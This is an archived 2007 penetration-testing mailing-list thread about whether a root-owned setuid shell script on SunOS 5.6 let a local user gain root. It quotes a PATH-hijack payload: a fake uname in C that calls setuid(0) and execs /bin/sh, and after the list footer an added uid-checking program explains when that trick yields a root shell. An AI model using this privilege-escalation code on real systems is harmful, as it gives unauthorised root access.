Penetration Testing mailing list archives
Re: solaris root-setuid script to gain root?
From: "Nathan Sportsman" <nsportsman () gmail com>
Date: Sun, 1 Jul 2007 12:38:26 -0500
Just to be clear...the owner of your uname program is root and the setuid bit is set on it, right?

chmod u=+s uname

Try doing setuid(geteuid()) and see what effective user id the program is actually being run as.

Thanks
Nathan Sportsman

On 7/1/07, Vitalik N. <robert.morris.jr () gmail com> wrote:

On 7/1/07, Thomas Pollet <thomas.pollet () gmail com> wrote:
> Hello,
>
> On 30/06/07, Vitalik N. <robert.morris.jr () gmail com> wrote:
> > Hi
> >
> > I was doing pen testing the other day and I found one root suid script
> > left by some of the web developers:
> >
> > -rwsr-x--x 1 root users /home/web/c.cgi
> >
> > which is basically a bash script:
> >
> > ------ cut ------------
> > #!/bin/sh
> >
> > uname
> > ------ cut ------------
> >
> > And our system was recently compromised. Some local user was able to
> > gain root access. Could this script be the way of gaining root access?
> >
> > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> > "Because it was not possible to write a secure suid shell script, the concept
> > of suid shell scripts was removed from Unix." But then it says "Solaris now
> > supports suid shell"!
> > I tried modifying the PATH variable and creating my own "uname" program.
> > But my uname program runs with local user privs instead of root. I
> > also tried the
>
> did you put a setuid(0) in your uname program?
>
> f.i.:
> cat >uname.c<<EOF
> #include <unistd.h>
> int main (int argc, char **argv, char **envp) {
>     setuid(0);
>     setgid(0);
>     execve("/bin/sh", argv, envp);
> }
> EOF
>
> > other attack described in the link above: "link to -i" but this didn't
> > work either.
> > So could this script be the problem?
> >
> > P.S: The machine runs SunOS 5.6 with all updates
>
> Regards,
> Thomas Pollet

Yes, my uname program was exactly the same. But I used the execl call instead of execve (don't think that would make any difference). I also tried setting the euid (seteuid(0)).

Using a bash script for the "uname" program didn't work either:

% cat uname
#!/bin/sh
touch /tmp/test
chown root /tmp/test

The script complains about privileges and can't execute chown.
------------------------------------------------------------------------ This List Sponsored by: Cenzic Swap Out your SPI or Watchfire app sec solution for Cenzic's robust, accurate risk assessment and management solution FREE - limited Time Offer http://www.cenzic.com/wf-spi ------------------------------------------------------------------------
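Nathan's suggestion (call setuid(geteuid()) and look at which uid the program is really running as) turned into a drop-in diagnostic. This is an added example, not code posted by anyone in the thread. It assumes a C compiler on the target and that the built binary is placed in a directory that comes first in PATH before /home/web/c.cgi (the path from the thread) is run; the classification names and the log line format are this example's own choices. Rather than blindly calling setuid(0) and exec'ing a shell, it records the real and effective uid/gid the script actually hands to its child, which separates "the shell never had root" from "the shell had root but nothing made it permanent".

```c
/* uname.c: drop-in replacement for "uname" that reports the credentials a
 * setuid script passes to the commands it runs. Added example; assumptions:
 * cc is available and this binary shadows the real uname via PATH.
 *   cc -o uname uname.c && PATH=$PWD:$PATH /home/web/c.cgi
 */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Classify a (real uid, effective uid) pair. Pure function so the logic
 * can be checked without actually being root. Labels are this example's. */
const char *classify_ids(uid_t ruid, uid_t euid)
{
    if (euid == 0 && ruid == 0)
        return "root";          /* fully root already; setuid(0) is a no-op */
    if (euid == 0)
        return "setuid-root";   /* euid 0 inherited: setuid(0) makes it permanent */
    if (euid != ruid)
        return "setuid-other";  /* elevated to some non-root file owner */
    return "unprivileged";      /* caller's own identity: the script gave nothing */
}

/* setuid(geteuid()): with euid 0 this sets real and saved uid to 0 as well,
 * so a later exec'd shell keeps root. Without root privilege the kernel only
 * lets a process pick its effective uid, so the real uid stays as it was.
 * Returns 1 if the real uid now equals the effective uid, else 0. */
int make_privileges_permanent(void)
{
    uid_t euid = geteuid();
    if (setuid(euid) != 0)
        return 0;
    return getuid() == euid;
}

int main(void)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();

    /* Print to both streams: a CGI wrapper may swallow one of them. */
    FILE *streams[2] = { stdout, stderr };
    for (int i = 0; i < 2; i++)
        fprintf(streams[i], "uname-probe: ruid=%lu euid=%lu rgid=%lu egid=%lu class=%s\n",
                (unsigned long)ruid, (unsigned long)euid,
                (unsigned long)rgid, (unsigned long)egid,
                classify_ids(ruid, euid));

    int permanent = make_privileges_permanent();
    fprintf(stderr, "uname-probe: setuid(geteuid()) -> %s (ruid now %lu)\n",
            permanent ? "real uid follows effective uid" : "real uid unchanged",
            (unsigned long)getuid());
    return 0;
}
```

Reading the output: a line with euid=0 and a non-zero ruid means the PATH substitution worked and the script's interpreter did run with root privileges, so a Thomas-style setuid(0) followed by an exec of /bin/sh will give a root shell. A line with ruid and euid both equal to the tester's own uid means the shell that interpreted c.cgi was not running as root by the time it executed uname (some shells, bash among them unless started with -p, reset the effective uid to the real uid at startup when the two differ), and no amount of setuid() or seteuid() inside the replacement uname can recover privilege that the child never received; the investigation then has to look elsewhere for the route the local user took.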
Current thread:
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Nathan Sportsman (Jul 01)
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Krugger (Jul 05)
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Nathan Sportsman (Jul 01)